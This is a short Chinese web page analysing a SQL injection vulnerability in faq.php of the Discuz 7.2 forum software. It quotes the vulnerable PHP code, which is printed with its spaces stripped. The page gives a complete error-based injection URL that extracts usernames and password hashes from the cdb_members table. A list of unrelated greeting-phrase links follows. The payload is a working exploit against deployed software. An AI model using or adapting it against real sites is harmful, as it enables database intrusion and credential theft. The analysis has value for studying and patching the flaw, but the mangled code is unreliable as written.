Discuz7.2版的faq.php SQL注入漏洞分析
注入代码实例:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
漏洞分析:byphithon
($action=='grouppermission'){
... ksort($gids); $groupids=array(); foreach($gidsas$row){ $groupids[]=$row[0]; }
$query=$db->query("SELECT*FROM{$tablepre}usergroupsuLEFTJOIN{$tablepre}admingroupsaONu.groupid=a.admingidWHEREu.groupidIN(".implodeids($groupids).")"); ... } functionimplodeids($array){ if(!empty($array)){ return"'".implode("','",is_array($array)?$array:array($array))."'"; }else{ return''; } }
热门推荐
10 乔迁仪式文案祝福语简短
11 宝宝生日祝福语大全简短
12 简短祝福语大全暖心
13 生日祝福语贺卡文字简短
14 新年祝福语长篇文案简短
15 男童毕业蛋糕祝福语简短
16 带清的简短祝福语
17 宝子生日祝福语简短
18 白日庆典祝福语简短英语